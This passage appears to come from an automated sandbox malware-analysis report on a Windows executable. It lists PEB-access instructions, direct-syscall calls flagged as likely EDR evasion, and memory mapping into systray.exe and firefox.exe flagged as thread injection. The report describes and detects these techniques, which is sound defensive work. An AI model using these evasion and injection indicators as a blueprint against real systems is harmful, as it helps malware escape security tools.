              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C09AD mov eax, dword ptr fs:[00000030h]0_2_010C09AD
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011489B3 mov esi, dword ptr fs:[00000030h]0_2_011489B3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011489B3 mov eax, dword ptr fs:[00000030h]0_2_011489B3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011489B3 mov eax, dword ptr fs:[00000030h]0_2_011489B3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118A9D3 mov eax, dword ptr fs:[00000030h]0_2_0118A9D3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011569C0 mov eax, dword ptr fs:[00000030h]0_2_011569C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA9D0 mov eax, dword ptr fs:[00000030h]0_2_010CA9D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA9D0 mov eax, dword ptr fs:[00000030h]0_2_010CA9D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA9D0 mov eax, dword ptr fs:[00000030h]0_2_010CA9D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA9D0 mov eax, dword ptr fs:[00000030h]0_2_010CA9D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA9D0 mov eax, dword ptr fs:[00000030h]0_2_010CA9D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA9D0 mov eax, dword ptr fs:[00000030h]0_2_010CA9D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F49D0 mov eax, dword ptr fs:[00000030h]0_2_010F49D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114E9E0 mov eax, dword ptr fs:[00000030h]0_2_0114E9E0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F29F9 mov eax, dword ptr fs:[00000030h]0_2_010F29F9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F29F9 mov eax, dword ptr fs:[00000030h]0_2_010F29F9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114C810 mov eax, dword ptr fs:[00000030h]0_2_0114C810
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116483A mov eax, dword ptr fs:[00000030h]0_2_0116483A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116483A mov eax, dword ptr fs:[00000030h]0_2_0116483A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E2835 mov eax, dword ptr fs:[00000030h]0_2_010E2835
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E2835 mov eax, dword ptr fs:[00000030h]0_2_010E2835
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E2835 mov eax, dword ptr fs:[00000030h]0_2_010E2835
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E2835 mov ecx, dword ptr fs:[00000030h]0_2_010E2835
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E2835 mov eax, dword ptr fs:[00000030h]0_2_010E2835
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E2835 mov eax, dword ptr fs:[00000030h]0_2_010E2835
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA830 mov eax, dword ptr fs:[00000030h]0_2_010FA830
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D2840 mov ecx, dword ptr fs:[00000030h]0_2_010D2840
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C4859 mov eax, dword ptr fs:[00000030h]0_2_010C4859
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C4859 mov eax, dword ptr fs:[00000030h]0_2_010C4859
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F0854 mov eax, dword ptr fs:[00000030h]0_2_010F0854
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01156870 mov eax, dword ptr fs:[00000030h]0_2_01156870
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01156870 mov eax, dword ptr fs:[00000030h]0_2_01156870
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114E872 mov eax, dword ptr fs:[00000030h]0_2_0114E872
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114E872 mov eax, dword ptr fs:[00000030h]0_2_0114E872
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114C89D mov eax, dword ptr fs:[00000030h]0_2_0114C89D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C0887 mov eax, dword ptr fs:[00000030h]0_2_010C0887
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE8C0 mov eax, dword ptr fs:[00000030h]0_2_010EE8C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011908C0 mov eax, dword ptr fs:[00000030h]0_2_011908C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC8F9 mov eax, dword ptr fs:[00000030h]0_2_010FC8F9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC8F9 mov eax, dword ptr fs:[00000030h]0_2_010FC8F9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118A8E4 mov eax, dword ptr fs:[00000030h]0_2_0118A8E4
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113EB1D mov eax, dword ptr fs:[00000030h]0_2_0113EB1D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113EB1D mov eax, dword ptr fs:[00000030h]0_2_0113EB1D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113EB1D mov eax, dword ptr fs:[00000030h]0_2_0113EB1D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113EB1D mov eax, dword ptr fs:[00000030h]0_2_0113EB1D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113EB1D mov eax, dword ptr fs:[00000030h]0_2_0113EB1D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113EB1D mov eax, dword ptr fs:[00000030h]0_2_0113EB1D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113EB1D mov eax, dword ptr fs:[00000030h]0_2_0113EB1D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113EB1D mov eax, dword ptr fs:[00000030h]0_2_0113EB1D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113EB1D mov eax, dword ptr fs:[00000030h]0_2_0113EB1D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194B00 mov eax, dword ptr fs:[00000030h]0_2_01194B00
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EEB20 mov eax, dword ptr fs:[00000030h]0_2_010EEB20
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EEB20 mov eax, dword ptr fs:[00000030h]0_2_010EEB20
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01188B28 mov eax, dword ptr fs:[00000030h]0_2_01188B28
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01188B28 mov eax, dword ptr fs:[00000030h]0_2_01188B28
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116EB50 mov eax, dword ptr fs:[00000030h]0_2_0116EB50
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01192B57 mov eax, dword ptr fs:[00000030h]0_2_01192B57
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01192B57 mov eax, dword ptr fs:[00000030h]0_2_01192B57
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01192B57 mov eax, dword ptr fs:[00000030h]0_2_01192B57
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01192B57 mov eax, dword ptr fs:[00000030h]0_2_01192B57
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01168B42 mov eax, dword ptr fs:[00000030h]0_2_01168B42
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01156B40 mov eax, dword ptr fs:[00000030h]0_2_01156B40
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01156B40 mov eax, dword ptr fs:[00000030h]0_2_01156B40
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118AB40 mov eax, dword ptr fs:[00000030h]0_2_0118AB40
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B8B50 mov eax, dword ptr fs:[00000030h]0_2_010B8B50
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01174B4B mov eax, dword ptr fs:[00000030h]0_2_01174B4B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01174B4B mov eax, dword ptr fs:[00000030h]0_2_01174B4B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BCB7E mov eax, dword ptr fs:[00000030h]0_2_010BCB7E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01174BB0 mov eax, dword ptr fs:[00000030h]0_2_01174BB0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01174BB0 mov eax, dword ptr fs:[00000030h]0_2_01174BB0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0BBE mov eax, dword ptr fs:[00000030h]0_2_010D0BBE
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0BBE mov eax, dword ptr fs:[00000030h]0_2_010D0BBE
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C0BCD mov eax, dword ptr fs:[00000030h]0_2_010C0BCD
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C0BCD mov eax, dword ptr fs:[00000030h]0_2_010C0BCD
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C0BCD mov eax, dword ptr fs:[00000030h]0_2_010C0BCD
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E0BCB mov eax, dword ptr fs:[00000030h]0_2_010E0BCB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E0BCB mov eax, dword ptr fs:[00000030h]0_2_010E0BCB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E0BCB mov eax, dword ptr fs:[00000030h]0_2_010E0BCB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116EBD0 mov eax, dword ptr fs:[00000030h]0_2_0116EBD0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114CBF0 mov eax, dword ptr fs:[00000030h]0_2_0114CBF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EEBFC mov eax, dword ptr fs:[00000030h]0_2_010EEBFC
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C8BF0 mov eax, dword ptr fs:[00000030h]0_2_010C8BF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C8BF0 mov eax, dword ptr fs:[00000030h]0_2_010C8BF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C8BF0 mov eax, dword ptr fs:[00000030h]0_2_010C8BF0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114CA11 mov eax, dword ptr fs:[00000030h]0_2_0114CA11
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EEA2E mov eax, dword ptr fs:[00000030h]0_2_010EEA2E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FCA24 mov eax, dword ptr fs:[00000030h]0_2_010FCA24
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FCA38 mov eax, dword ptr fs:[00000030h]0_2_010FCA38
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E4A35 mov eax, dword ptr fs:[00000030h]0_2_010E4A35
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E4A35 mov eax, dword ptr fs:[00000030h]0_2_010E4A35
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0A5B mov eax, dword ptr fs:[00000030h]0_2_010D0A5B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0A5B mov eax, dword ptr fs:[00000030h]0_2_010D0A5B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C6A50 mov eax, dword ptr fs:[00000030h]0_2_010C6A50
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C6A50 mov eax, dword ptr fs:[00000030h]0_2_010C6A50
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C6A50 mov eax, dword ptr fs:[00000030h]0_2_010C6A50
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C6A50 mov eax, dword ptr fs:[00000030h]0_2_010C6A50
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C6A50 mov eax, dword ptr fs:[00000030h]0_2_010C6A50
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C6A50 mov eax, dword ptr fs:[00000030h]0_2_010C6A50
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C6A50 mov eax, dword ptr fs:[00000030h]0_2_010C6A50
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FCA6F mov eax, dword ptr fs:[00000030h]0_2_010FCA6F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FCA6F mov eax, dword ptr fs:[00000030h]0_2_010FCA6F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FCA6F mov eax, dword ptr fs:[00000030h]0_2_010FCA6F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113CA72 mov eax, dword ptr fs:[00000030h]0_2_0113CA72
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113CA72 mov eax, dword ptr fs:[00000030h]0_2_0113CA72
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116EA60 mov eax, dword ptr fs:[00000030h]0_2_0116EA60
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CEA80 mov eax, dword ptr fs:[00000030h]0_2_010CEA80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CEA80 mov eax, dword ptr fs:[00000030h]0_2_010CEA80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CEA80 mov eax, dword ptr fs:[00000030h]0_2_010CEA80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CEA80 mov eax, dword ptr fs:[00000030h]0_2_010CEA80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CEA80 mov eax, dword ptr fs:[00000030h]0_2_010CEA80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CEA80 mov eax, dword ptr fs:[00000030h]0_2_010CEA80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CEA80 mov eax, dword ptr fs:[00000030h]0_2_010CEA80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CEA80 mov eax, dword ptr fs:[00000030h]0_2_010CEA80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CEA80 mov eax, dword ptr fs:[00000030h]0_2_010CEA80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194A80 mov eax, dword ptr fs:[00000030h]0_2_01194A80
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F8A90 mov edx, dword ptr fs:[00000030h]0_2_010F8A90

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtClose: Direct from: 0x76EF2B6C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeSection loaded: NULL target: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeSection loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
